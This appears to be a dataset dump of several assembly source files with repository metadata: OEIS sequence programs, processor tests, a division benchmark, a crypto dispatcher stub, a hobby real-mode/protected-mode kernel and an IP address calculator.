.byt STAGE_PIT_BANK_NUMBER ; Pit
.byt STAGE_SHELF_BANK_NUMBER ; Shelf
.byt STAGE_GEM_BANK_NUMBER ; Gem
stages_tileset_lsb:
.byt <tileset_ruins ; Plateau
.byt <tileset_jungle ; Pit
.byt <tileset_ruins ; Shelf
.byt <tileset_magma ; Gem
stages_tileset_msb:
.byt >tileset_ruins ; Plateau
.byt >tileset_jungle ; Pit
.byt >tileset_ruins ; Shelf
.byt >tileset_magma ; Gem
stages_tileset_bank:
.byt TILESET_RUINS_BANK_NUMBER ; Plateau
.byt TILESET_JUNGLE_BANK_NUMBER ; Pit
.byt TILESET_RUINS_BANK_NUMBER ; Shelf
.byt TILESET_MAGMA_BANK_NUMBER ; Gem
| 26.907407
| 48
| 0.827942
|
861fd85dc929aeea1732dc1c331845621c471ed4
| 351
|
asm
|
Assembly
|
oeis/287/A287655.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/287/A287655.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/287/A287655.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A287655: Seven steps forward, six steps back.
; Submitted by Simon Strandgaard
; 0,1,2,3,4,5,6,7,6,5,4,3,2,1,2,3,4,5,6,7,8,7,6,5,4,3,2,3,4,5,6,7,8,9,8,7,6,5,4,3,4,5,6,7,8,9,10,9,8,7,6,5,4,5,6,7,8,9,10,11,10,9,8,7,6,5,6,7,8,9,10,11,12,11,10,9,8,7,6,7,8,9,10
lpb $0
sub $0,3
add $1,1
add $2,10
trn $2,$0
trn $0,10
add $0,$2
lpe
add $0,$1
| 25.071429
| 177
| 0.569801
|
7f78d3506badf4352ee20dc193e46353c84292de
| 649
|
asm
|
Assembly
|
programs/oeis/243/A243383.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | 1
|
2021-03-15T11:38:20.000Z
|
2021-03-15T11:38:20.000Z
|
programs/oeis/243/A243383.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/243/A243383.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
; A243383: Number of length n+3 0..2 arrays with no four elements in a row with pattern abba (with a!=b) and new values 0..2 introduced in 0..2 order.
; 13,35,96,265,733,2029,5618,15557,43081,119303,330384,914929,2533705,7016569,19430930,53809925,149015413,412667243,1142796240,3164736889,8764081669,24270304357,67211568290,186128482181,515444182609,1427415633935,3952931201376,10946822152801,30314950890961,83950961721457,232484756426210,643818258448133,1782920980639645,4937429439897011
mov $2,$0
add $2,2
mov $3,$2
add $3,2
mov $0,$3
cal $0,98182 ; a(n) = 3*a(n-1) - a(n-2) + a(n-3), a(0)=1,a(1)=1,a(2)=3.
mov $1,$0
sub $1,25
div $1,2
add $1,13
| 46.357143
| 337
| 0.751926
|
d2c4ec53116b01c6ed98b60856a7c198e27f3ebb
| 1,306
|
asm
|
Assembly
|
sw/552tests/rand_simple/t_4_st.asm
|
JPShen-UWM/ThreadKraken
|
849c510531f28e36d3469535737b2120bd774935
|
[
"MIT"
] | 1
|
2022-02-15T16:03:25.000Z
|
2022-02-15T16:03:25.000Z
|
sw/552tests/rand_simple/t_4_st.asm
|
JPShen-UWM/ThreadKraken
|
849c510531f28e36d3469535737b2120bd774935
|
[
"MIT"
] | null | null | null |
sw/552tests/rand_simple/t_4_st.asm
|
JPShen-UWM/ThreadKraken
|
849c510531f28e36d3469535737b2120bd774935
|
[
"MIT"
] | null | null | null |
// seed 4
lbi r0, 161 // icount 0
slbi r0, 232 // icount 1
lbi r1, 57 // icount 2
slbi r1, 141 // icount 3
lbi r2, 221 // icount 4
slbi r2, 143 // icount 5
lbi r3, 29 // icount 6
slbi r3, 17 // icount 7
lbi r4, 151 // icount 8
slbi r4, 248 // icount 9
lbi r5, 248 // icount 10
slbi r5, 76 // icount 11
lbi r6, 54 // icount 12
slbi r6, 5 // icount 13
lbi r7, 166 // icount 14
slbi r7, 96 // icount 15
andni r1, r1, 1 // icount 16
st r3, r1, 10 // icount 17
andni r1, r1, 1 // icount 18
st r6, r1, 2 // icount 19
andni r5, r5, 1 // icount 20
st r6, r5, 14 // icount 21
andni r6, r6, 1 // icount 22
st r1, r6, 8 // icount 23
andni r3, r3, 1 // icount 24
st r5, r3, 14 // icount 25
andni r1, r1, 1 // icount 26
st r4, r1, 10 // icount 27
andni r2, r2, 1 // icount 28
st r6, r2, 10 // icount 29
andni r5, r5, 1 // icount 30
st r1, r5, 4 // icount 31
andni r5, r5, 1 // icount 32
st r3, r5, 4 // icount 33
andni r6, r6, 1 // icount 34
st r0, r6, 0 // icount 35
andni r3, r3, 1 // icount 36
st r4, r3, 6 // icount 37
andni r4, r4, 1 // icount 38
st r5, r4, 12 // icount 39
andni r6, r6, 1 // icount 40
st r1, r6, 2 // icount 41
andni r2, r2, 1 // icount 42
st r0, r2, 12 // icount 43
andni r5, r5, 1 // icount 44
st r4, r5, 8 // icount 45
andni r1, r1, 1 // icount 46
st r3, r1, 12 // icount 47
halt // icount 48
| 25.607843
| 28
| 0.611792
|
23e458e1dc65b86502849f246bff25aecc1070c8
| 401
|
asm
|
Assembly
|
oeis/075/A075765.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/075/A075765.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/075/A075765.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A075765: a(n) = floor(prime(n)/n) + (prime(n) mod n).
; Submitted by Jamie Morken(s2)
; 2,2,3,4,3,3,5,5,7,11,11,4,5,4,5,8,11,10,13,14,13,16,17,20,25,26,25,26,25,26,7,7,9,7,13,11,13,15,15,17,19,17,23,21,21,19,27,35,35,33,33,35,33,39,41,43,45,43,45,45,43,49,59,59,57,57,67,69,7,73,73,75,7,8,9,8,9,12
mov $1,$0
seq $0,40 ; The prime numbers.
add $1,1
mov $2,$0
div $2,$1
add $2,$0
mul $0,$1
mod $0,$2
| 30.846154
| 211
| 0.605985
|
279b90d837e3717dbde6a08b5dc2f2393cc7ff2f
| 8
|
asm
|
Assembly
|
T6P1/Halt.asm
|
cggewehr/Projeto-De-Processadores
|
a7e0735342b83b3524152060162330423b3672c5
|
[
"CC0-1.0"
] | null | null | null |
T6P1/Halt.asm
|
cggewehr/Projeto-De-Processadores
|
a7e0735342b83b3524152060162330423b3672c5
|
[
"CC0-1.0"
] | null | null | null |
T6P1/Halt.asm
|
cggewehr/Projeto-De-Processadores
|
a7e0735342b83b3524152060162330423b3672c5
|
[
"CC0-1.0"
] | null | null | null |
halt
| 8
| 8
| 0.5
|
dd7a15b2f5a22d54016056374683a76adf0595f5
| 351
|
asm
|
Assembly
|
programs/oeis/143/A143131.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/143/A143131.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/143/A143131.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A143131: Binomial transform of [1, 4, 10, 20, 0, 0, 0,...].
; 1,5,19,63,157,321,575,939,1433,2077,2891,3895,5109,6553,8247,10211,12465,15029,17923,21167,24781,28785,33199,38043,43337,49101,55355,62119,69413,77257,85671,94675,104289,114533,125427,136991,149245
mov $2,$0
mul $0,2
bin $0,3
mul $0,5
lpb $2
add $0,8
sub $2,1
lpe
div $0,2
add $0,1
| 25.071429
| 199
| 0.692308
|
e3add5701a6d2de44b9e2fd2a86f8b76f81195cc
| 1,222
|
asm
|
Assembly
|
Assembly/HW4/symTab.asm
|
DulceWRLD/College
|
9b94868514f461c97121d72ea0855f72ca95e798
|
[
"MIT"
] | 2
|
2021-08-21T01:25:50.000Z
|
2021-12-10T06:51:46.000Z
|
Assembly/HW4/symTab.asm
|
DulceWRLD/College
|
9b94868514f461c97121d72ea0855f72ca95e798
|
[
"MIT"
] | null | null | null |
Assembly/HW4/symTab.asm
|
DulceWRLD/College
|
9b94868514f461c97121d72ea0855f72ca95e798
|
[
"MIT"
] | 6
|
2021-03-14T22:21:23.000Z
|
2022-03-29T15:30:58.000Z
|
.data
inArr: .word 0:40
symTab: .word 0:40
prompt: .asciiz "Enter new set of tokens and types"
LOC: .word 0
.text
main:
li $t0,0x0400
sw $t0, LOC
inLoop:
jal getTokens
li $t9, 0 # DEFN
li $t0, 0 # index to inArr
lb $s0, inArr+12($t0)
bne $s0, ':', operator
jal getLabel
operator:
lb $s0, ','
lw $s1, inArr+20($t0)
chkVar:
bne $s1, 0x32, noVar
# found a variable
# save the var and LOC into symTab
jal getVar
noVar:
addi $t0, $t0, 12
lb $s0, inArr($t0)
bne $s0, ',', noVar
lw $s1, inArr+20($t0)
b chkVar
# more checks for '#' for the end of inArr should be included
jal dumpSymTab
jal clearInArr
b inLoop
#
# Save from keyboard to inArr table
#
getTokens:
#
# getLabel: Label is found, save it in symTab
#
getLabel:
#
# getVar:
#
getVar:
#
# dumpSymTab
#
dumpSymTab:
#
# clearInArr
#
clearInArr:
| 13.730337
| 69
| 0.442717
|
8df4b106610400ff4c04c0f5466402571c3c1f77
| 8,077
|
asm
|
Assembly
|
ip_calculator.asm
|
retq/IPv4-Calculator
|
daeb560f5978e1fd4b50b286689c0c20d727dfce
|
[
"MIT"
] | null | null | null |
ip_calculator.asm
|
retq/IPv4-Calculator
|
daeb560f5978e1fd4b50b286689c0c20d727dfce
|
[
"MIT"
] | null | null | null |
ip_calculator.asm
|
retq/IPv4-Calculator
|
daeb560f5978e1fd4b50b286689c0c20d727dfce
|
[
"MIT"
] | null | null | null |
include "emu8086.inc"
org 100h
; Various procedures called to do the task
call input
call printip
call binary
call network
call broadcast
call subn
call host
call wild
call pause
call credits
call endprog
input proc
;-------------------------- Opening screen ----------------------------------
GOTOXY 34, 10
print "Hello "
GOTOXY 23, 13
printn "Welcome to IP calculator(IPv4)"
mov cx, 5
;Used so that the welcome screen stays for few seconds
space:
printn ""
loop space
call clear_screen
mov cx, 0
GOTOXY 20, 0
print "Input data "
GOTOXY 0, 2
;-----------------------taking IP address as input as 4 octet ---------------------------
start:
print "Enter octet: "
call scan_num
printn ""
mov ip[si], cl
inc si
inc e
cmp e, 4
jne start
;----------------------- prefix mask and storing --------------------------
printn ""
print "Prefix: "
mov cx, 2
mov si, 0
prefixing:
mov ah, 1
int 21h
cmp al, 13
je calc
mov mask[si],al
inc si
loop prefixing
; converts and stores the prefix if it a 2 digit number
calc:
cmp si, 1
je line1
mov dx, 0
mov cx, si
mov si,0
multiple:
mov al, mask[si]
sub al, 30h
mov bl, g
mul bl
add dx, ax
mov g,1
inc si
loop multiple
mov prefix, dl
mov dx, 0
mov ax, 0
jmp print
; converts and stores the prefix if it a 1 digit number
line1:
mov si, 0
mov al, mask[si]
mov prefix, al
sub prefix, 30h
ret
input endp
;--------------------------IP address printing----------------------------
printip proc
GOTOXY 20, 8
print "Output "
printn ""
mov cx,1
print:
cmp cx,0
jne r
printn ""
print "IP Address: "
mov cx, 3
mov si, 0
move:
mov al, ip[si]
mov ah, 0
call print_num
mov dl, '.'
mov ah, 2
int 21h
inc si
loop move
mov al, ip[si]
mov ah, 0
dec cx
call print_num
r:
ret
ret
printip endp
;----------------------Binary calculation of IP ----------------------------
binary proc
mov c, 7
mov si, 0
mov f, 4
moving:
mov ah, 0
mov al, ip[si]
mov e, si
mov bh, 0
MOV bl, 2
mov si, c
;converts each octet into binary and stores it
calcbinary:
div bl
add ah, '0'
mov ipbinary[si], ah
mov ah, 00
dec si
cmp al, 00
jne calcbinary
;manual insertion of dots after each octet
mov si, dot
mov ipbinary[si], '.'
mov netbin[si], '.'
mov brdbin[si], '.'
mov subnet[si], '.'
mov wildmask[si], '.'
;updation of variables so as to use in next iteration
add e, 1
mov si, e
add c, 9
add dot, 9
sub f, 1
cmp f, 0
jne loop moving
ret
binary endp
;-------------------------Broadcast address calculation--------------------
broadcast proc
brdcast:
mov cl, prefix
mov ch, 0
mov si, 0
brdcalc:
mov al, netbin[si]
mov brdbin[si], al
inc si
loop brdcalc
printn ""
printn ""
print "Broadcast Address: "
printing brdbin
ret
broadcast endp
;--------------------------Network address calculation---------------------
network proc
cmp prefix, 8
jle netpart1
cmp prefix, 16
jle part1
jmp check1
part1:
add prefix, 1
jmp netpart1
check1:
cmp prefix, 24
jle part2
jmp check2
part2:
add prefix, 2
jmp netpart1
check2:
add prefix, 3
netpart1:
mov si, 0
add cl, prefix
mov ch, 0
networking:
mov bl, ipbinary[si]
mov netbin[si], bl
inc si
loop networking
;printing network address
printn ""
printn ""
print "Network Address: "
printing netbin
ret
network endp
;---------------------------Subnet Mask calculation-------------------------
subn proc
mov cl, prefix
mov ch, 0
mov si, 0
mov subnet[si], 31h
sub cl, 1
mov si, 1
subcalc:
cmp subnet[si], 46
je temp
mov subnet[si], 31h
temp:
inc si
loop subcalc
;printing subnet mask address
printn ""
printn ""
print "Subnet Mask Address: "
printing subnet
ret
subn endp
host proc
;-----------------------First host address calculation---------------------
mov si, 34
add netbin[si], 1 ;since 1st host address is same as network address
;printing first host addrss
printn ""
printn ""
print "First Host Address: "
printing netbin
;-----------------------Last host address calculation----------------------
mov si, 34
mov brdbin[si], 30h ;since last host address is same as broadcast address
;printing last host addrss
printn ""
printn ""
print "Last Host Address: "
printing brdbin
ret
host endp
;--------------------------Wild mask calculation---------------------------
wild proc
mov cl, prefix
mov ch, 0
mov si, 0
mov wildmask[si], 30h
sub cl, 1
mov si, 1
wildcalc:
cmp wildmask[si], 46
je temp1
mov wildmask[si], 30h
temp1:
inc si
loop wildcalc
;printing wild mask addrss
printn ""
printn ""
print "Wild Mask Address: "
printing wildmask
ret
wild endp
;---------------------Printing various address passed as array------------------------------
printing MACRO array
local p1,p2,p3,p4,p5 ; to avoid multiple declaration
mov loopCon, 0
mov si, 0
mov al, array[si]
sub al, 30h
mov bl, 2
p1:
mov ah, 0
mul bl
inc si
cmp array[si], '.'
je p2
add al, array[si]
sub al, 30h
mov dl, al
add loopCon, 1
cmp loopCon, 31
jne p1
jmp p5
p2:
mov ah, 0
mov al, dl
call print_num
cmp loopCon, 1Ah
jle p4
p3:
inc si
mov al, array[si]
mov ah, 0
add loopCon, 1
jmp p1
p4:
putc '.'
jmp p3
p5:
mov al, dl
mov ah, 0
call print_num
endm
;-------------------------------Credits screen-----------------------------
credits proc
call clear_screen
GOTOXY 36, 2
printn "Credits"
GOTOXY 34, 3
print "-----------"
GOTOXY 6, 6
printn "Mathana mathav - 19PD01"
GOTOXY 6, 8
printn "Mohammed Hafiz - 19PD22"
ret
credits endp
;---------------Used for pausing the program till a key is pressed---------
pause proc
printn ""
printn ""
print "Press any key.."
mov ah, 0
int 16h
ret
pause endp
;---------------------Used at the end to end the program-------------------
endprog proc
printn ""
printn ""
print "Press any key.."
mov ah, 0
int 16h
mov ah, 4ch
int 21h
ret
endprog endp
; Various variables used during processing
loopCon db 0
dot dw 8
c dw 0
e dw 0
f dw 0
g db 10
; Primary variables used for storing output
ipbinary db 35 dup('0')
netbin db 35 dup('0')
brdbin db 35 dup('1')
subnet db 35 dup('0') ; variable's size 35 bcoz 4 octet + 3 spot
wildmask db 35 dup('1') ; for dots so total of (4*8)+3=35
mask db 2 dup(?)
ip db 4 dup(?)
prefix db 0
ret
define_scan_num
define_print_string
define_print_num
define_print_num_uns
define_clear_screen
END
| 18.696759
| 93
| 0.480376
|
7860f78bc6fa389ae62b48dda8188db0d7a21b82
| 1,229
|
asm
|
Assembly
|
source/MicroBenchX.Ipc/IpcTests/div_float64.asm
|
clayne/MicroBenchX
|
9b109102d6cb5932d8a3e8a1b102ba0d0c33a1be
|
[
"MIT"
] | 15
|
2021-10-11T01:52:42.000Z
|
2022-02-14T15:32:42.000Z
|
source/MicroBenchX.Ipc/IpcTests/div_float64.asm
|
clayne/MicroBenchX
|
9b109102d6cb5932d8a3e8a1b102ba0d0c33a1be
|
[
"MIT"
] | null | null | null |
source/MicroBenchX.Ipc/IpcTests/div_float64.asm
|
clayne/MicroBenchX
|
9b109102d6cb5932d8a3e8a1b102ba0d0c33a1be
|
[
"MIT"
] | 1
|
2021-09-12T09:31:40.000Z
|
2021-09-12T09:31:40.000Z
|
[BITS 64]
%include "parameters.inc"
extern exit
global div_float64
section .text
div_float64:
push rbp
mov rbx, ITERATIONS_div_float64
xor rax, rax
xor rdx, rdx
mov rcx, __float64__(2.0)
mov rsi, __float64__(4.0)
mov rdi, __float64__(5.0)
mov r8, __float64__(6.0)
mov r9, __float64__(7.0)
mov r10, __float64__(8.0)
mov r11, __float64__(9.0)
mov r12, __float64__(10.0)
mov r13, __float64__(11.0)
mov r14, __float64__(12.0)
mov r15, __float64__(13.0)
.loop:
div rcx
xor rdx, rdx
xor rax, rax
div rsi
xor rdx, rdx
xor rax, rax
div rdi
xor rdx, rdx
xor rax, rax
div r8
xor rdx, rdx
xor rax, rax
div r9
xor rdx, rdx
xor rax, rax
div r10
xor rdx, rdx
xor rax, rax
div r11
xor rdx, rdx
xor rax, rax
div r12
xor rdx, rdx
xor rax, rax
div r13
xor rdx, rdx
xor rax, rax
div r14
xor rdx, rdx
xor rax, rax
div r15
xor rdx, rdx
xor rax, rax
dec rbx
jnz .loop
.exit:
lea rdi, [rel format]
pop rbp
xor rax, rax
mov rax, ITERATIONS_div_float64
mov rsi, 13 ; 11 div + 1 dec + 1 loop
mul rsi
ret
section .data
format: db "%lu", 10, 0
| 16.608108
| 41
| 0.598047
|
ebf2eb46509abd2f5d6272c52e5dd3cb0ae4f6bf
| 1,109
|
asm
|
Assembly
|
_build/dispatcher/jmp_ippsSMS4DecryptOFB_94aeb251.asm
|
zyktrcn/ippcp
|
b0bbe9bbb750a7cf4af5914dd8e6776a8d544466
|
[
"Apache-2.0"
] | 1
|
2021-10-04T10:21:54.000Z
|
2021-10-04T10:21:54.000Z
|
_build/dispatcher/jmp_ippsSMS4DecryptOFB_94aeb251.asm
|
zyktrcn/ippcp
|
b0bbe9bbb750a7cf4af5914dd8e6776a8d544466
|
[
"Apache-2.0"
] | null | null | null |
_build/dispatcher/jmp_ippsSMS4DecryptOFB_94aeb251.asm
|
zyktrcn/ippcp
|
b0bbe9bbb750a7cf4af5914dd8e6776a8d544466
|
[
"Apache-2.0"
] | null | null | null |
extern m7_ippsSMS4DecryptOFB:function
extern n8_ippsSMS4DecryptOFB:function
extern y8_ippsSMS4DecryptOFB:function
extern e9_ippsSMS4DecryptOFB:function
extern l9_ippsSMS4DecryptOFB:function
extern n0_ippsSMS4DecryptOFB:function
extern k0_ippsSMS4DecryptOFB:function
extern ippcpJumpIndexForMergedLibs
extern ippcpSafeInit:function
segment .data
align 8
dq .Lin_ippsSMS4DecryptOFB
.Larraddr_ippsSMS4DecryptOFB:
dq m7_ippsSMS4DecryptOFB
dq n8_ippsSMS4DecryptOFB
dq y8_ippsSMS4DecryptOFB
dq e9_ippsSMS4DecryptOFB
dq l9_ippsSMS4DecryptOFB
dq n0_ippsSMS4DecryptOFB
dq k0_ippsSMS4DecryptOFB
segment .text
global ippsSMS4DecryptOFB:function (ippsSMS4DecryptOFB.LEndippsSMS4DecryptOFB - ippsSMS4DecryptOFB)
.Lin_ippsSMS4DecryptOFB:
db 0xf3, 0x0f, 0x1e, 0xfa
call ippcpSafeInit wrt ..plt
align 16
ippsSMS4DecryptOFB:
db 0xf3, 0x0f, 0x1e, 0xfa
mov rax, qword [rel ippcpJumpIndexForMergedLibs wrt ..gotpc]
movsxd rax, dword [rax]
lea r11, [rel .Larraddr_ippsSMS4DecryptOFB]
mov r11, qword [r11+rax*8]
jmp r11
.LEndippsSMS4DecryptOFB:
| 28.435897
| 99
| 0.801623
|
a8e7b8e778308d9e55fdb69ebb4c235214fd7cc8
| 7,050
|
asm
|
Assembly
|
kernel4.asm
|
paule32/selfmade_os
|
bbdad9b0b7b737069e0a925bb515f3d355c6ee9f
|
[
"MIT"
] | null | null | null |
kernel4.asm
|
paule32/selfmade_os
|
bbdad9b0b7b737069e0a925bb515f3d355c6ee9f
|
[
"MIT"
] | null | null | null |
kernel4.asm
|
paule32/selfmade_os
|
bbdad9b0b7b737069e0a925bb515f3d355c6ee9f
|
[
"MIT"
] | null | null | null |
; ------------------------------------------------------------------------------
; Copyright (c) 2020 Jens Kallup - paule32 - non-profit
; all rights reserved.
; for non-commercial use only!
;
; Function: kernel boot - c kernel
; Filename: kernel4.asm
; ------------------------------------------------------------------------------
[BITS 16]
; org 0x8000 ; code start address
%include 'macros.inc'
extern k_setVideoMode_320x200 ; video16.asm
extern k_plotPixel_fast ; video16.asm
extern k_setVideoMode_80x25 ; video16.asm
extern k_drawline
section .text
jmp RealMode
section .data
shutdown_cmd equ 0xfe ; shutdown cmd for kbc
resetidtr: dw 0x0400 - 1 ; limit portion
hose_idtr: dd 0,0,0 ; hosed value & base address for idtr
section .text
global RealMode
RealMode:
setup_segments
call set_input_flag_0
add sp, -0x40 ; make room for input buffer (64 chars)
write_string msg_welcome2, loop_start
loop_start:
set_input_flag 1
write_string prompt, next ; show prompt
next:
set_input_flag 0
mov di, sp ; get input
call get_string
jcxz loop_start ; blank line? -> yes, ignore it
get_command cmd_hi , .helloworld
get_command cmd_help , .help
get_command cmd_exit , .exit
get_command cmd_video, .video
get_command cmd_pm , .pm
write_string msg_badcommand, loop_start ; unknow command
.helloworld: write_string msg_helloworld, loop_start
.help: write_string msg_help , loop_start
.video:
save_all_registers
call k_setVideoMode_320x200
call k_plotPixel_fast
call k_drawline
get_any_key
call k_setVideoMode_80x25
restore_all_registers
jmp RealMode
.exit:
write_string msg_exit, $
get_any_key
pc_reboot
.pm:
call clrscr
write_string msg_pm, $
call Waitingloop
cli ; clear interrupts
lgdt [gdtr] ; load gdt via gdtr (see file: gtd.asm)
; we actually only need to do this ONCE, but for now it doesn't hurt to do this more often when
; switching between RM and PM
in al, 0x92 ; switch A20 gate via fast A20 port 92
cmp al, 0xff ; if it reads 0xff, nothing's implemented on this port
je .no_fast_A20
or al, 2 ; set A20 gate bit (bit: 1)
and al, ~1 ; clear init_now bit (don't reset pc ,,,)
out 0x92, al
jmp .A20_done
.no_fast_A20: ; no fast shortcut -> use the slow kbc ...
call empty_8042
mov al, 0xd1 ; kbc command: write to output port
out 0x64, al
call empty_8042
mov al, 0xdf ; writing this to kbc output port enables A20
out 0x60, al
call empty_8042
.A20_done:
mov eax, cr0 ; switch over to protected mode
or al, 1 ; set bit 0 of cr0 register
mov cr0, eax ;
jmp 0x8:ProtectedMode ; http://www.nasm.us/doc/nasmdo10.html#section-10.1
empty_8042:
call Waitingloop
in al, 0x64
cmp al, 0xff ; .. no real kbc at all?
je .done
test al, 1 ; something in input buffer
jz .no_output
call Waitingloop
in al, 0x60 ; yes, read buffer
jmp empty_8042 ; and try again
.no_output:
test al, 2 ; command buffer empty?
jnz empty_8042 ; no, we can't send anything new till it's empty
.done:
ret
set_input_flag_0:
mov al, byte 0
mov byte [input_flag], al
ret
set_input_flag_1:
mov al, byte 1
mov byte [input_flag], al
ret
print_string:
mov ah, 0x0e
.loop_start:
lodsb ; grab a byte from si
test al, al ; test al
jz .done ; if the result is zero, get out
int 0x10
jmp .loop_start
.done:
mov al, byte [input_flag]
cmp al, byte 1
je .donedone
sti
mov ah, 0x0e
mov al, 5
add al, 5
add al, 3
int 0x10
sub al, 3
int 0x10
.donedone:
ret
get_string:
xor cx, cx
.loop_start:
xor ax, ax
int 0x16 ; wait for keypress
cmp al, 8 ; backspace pressed?
je .backspace ; yes, handle it
cmp al, 13 ; enter pressed?
je .done ; yes, we are done
cmp cl, 63 ; 63 chars inputted?
je .loop_start ; yes, only let in backspace and enter
mov ah, 0x0e ;
int 0x10 ; print character
stosb ; put char in buffer
inc cx
jmp .loop_start
.backspace:
jcxz .loop_start ; zero? (start of the string) if yes, ignore the key
dec di
mov byte [di], 0 ; delete char
dec cx ; decrement counter as well
mov ah, 0x0e
int 0x10 ; backspace on the screen
mov al, ' ' ;
int 0x10 ; blank char out
mov al, 8
int 0x10 ; backspace again
jmp .loop_start ; go to the main loop
.done:
mov byte [di], 0 ; null terminate
mov ax, 0x0e0d
int 0x10
mov al, 0x0a
int 0x10 ; new line
ret
strcmp:
.loop_start:
mov al, [si] ; grab a byte from si register
cmp al, [di] ; are si and di equal?
jne .done ; no, we are done
test al, al ; zero?
jz .done ; yes, we are done
inc di ; increment di
inc si ; increment si
jmp .loop_start ; loop!
.done:
ret
clrscr:
mov ax, 0x0600
xor cx, cx
mov dx, 0x174f
mov bh, 0x07
int 0x10
ret
; --------------------------------------------
; protected mode ...
; --------------------------------------------
[bits 32]
;extern RealEntry ; this is in the C file
ProtectedMode:
mov ax, 0x10
mov ds, ax ; data descriptor
mov ss, ax
mov es, ax
xor eax, eax
mov fs, ax
mov gs, ax
mov esp, 0x200000 ; set stack below 2 MB limit
call clrscr_32
mov ah, 0x01
.endlessloop:
call Waitingloop
inc ah
and ah, 0x0f
mov esi, msg_pm2 ; 'OS currently uses Protected Mode.'
call PutStr_32
cmp dword [PutStr_Ptr], 25 * 80 * 2 + 0xB8000
jb .endlessloop
mov dword [PutStr_Ptr], 0xB8000 ; text pointer wrap-arround
; call RealEntry ; ->-> C-kernel
jmp $
Waitingloop:
mov ebx, 0x9ffff
.loop_start:
dec ebx
jnz .loop_start
ret
PutStr_32:
mov edi, [PutStr_Ptr]
.nextchar:
lodsb
test al, al
jz .end
stosw
jmp .nextchar
.end:
mov [PutStr_Ptr], edi
ret
clrscr_32:
mov edi, 0xb8000
mov [PutStr_Ptr], edi
mov ecx, 40 * 25
mov eax, 0x07200720 ; two times: 0x07 => white text & black background 0x20 => Space
rep stosd
ret
section .data
PutStr_Ptr dd 0xb8000
msg_welcome2: db "kernel loaded, ready for input.", 0
msg_helloworld: db "Hello from PC!", 0
msg_badcommand: db "Bad command entered.", 0
prompt: db "ram://",0
cmd_help: db "help", 0
cmd_hi: db "hi", 0
cmd_exit: db "exit", 0
cmd_video: db "video", 0
cmd_pm: db "pm", 0
msg_help: db "Commands: hi, help, video, pm, exit", 0
msg_exit: db "Reboot starts now. Enter keystroke, please.", 0
msg_pm: db "Switch-over to Protected Mode.", 0
msg_pm2: db "OS currently uses Protected Mode.", 0
idt_real: dw 0x3ff ; 256 entries; each 4b = 1K
dd 0 ; Real Mode
savecr0: dd 0
input_flag: db 0
%include "gdt.inc"
| 22.596154
| 95
| 0.60922
|
e737c3bd491c192b649494c39a20c6d61448ec5a
| 620
|
asm
|
Assembly
|
oeis/060/A060348.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/060/A060348.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/060/A060348.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A060348: a(n) = n^n * (n^2 - 1)/24.
; Submitted by Jon Maiga
; 9,160,3125,68040,1647086,44040192,1291401630,41250000000,1426558353055,53125098504192,2120125746145771,90285055457658880,4087009643554687500,195996655783163985920,9926883142636041170124,529537075346699234869248,29676294834904703836859685,1743257600000000000000000000,107114095337076346225320614385,6871236031954918592607515312128,459370295996654064755810724032474,31954086320371390481592576953548800,2309263891220325604081153869628906250,173140863193326299366156464361255731200
add $0,3
mov $1,$0
pow $0,$0
pow $1,2
sub $1,1
mul $0,$1
mul $0,2
div $0,48
| 47.692308
| 479
| 0.854839
|
2c8d0cbd3cc84b9da9d4925ce80ad8962b2c55f0
| 56,570
|
asm
|
Assembly
|
target/cos_117/disasm/iop_overlay1/CONCERR.asm
|
jrrk2/cray-sim
|
52c9639808d6890517092637b188282c00cce4f7
|
[
"BSL-1.0"
] | 49
|
2020-10-09T12:29:16.000Z
|
2022-03-12T02:33:35.000Z
|
target/cos_117/disasm/iop_overlay1/CONCERR.asm
|
jrrk2/cray-sim
|
52c9639808d6890517092637b188282c00cce4f7
|
[
"BSL-1.0"
] | 1
|
2021-12-29T15:59:25.000Z
|
2021-12-29T15:59:25.000Z
|
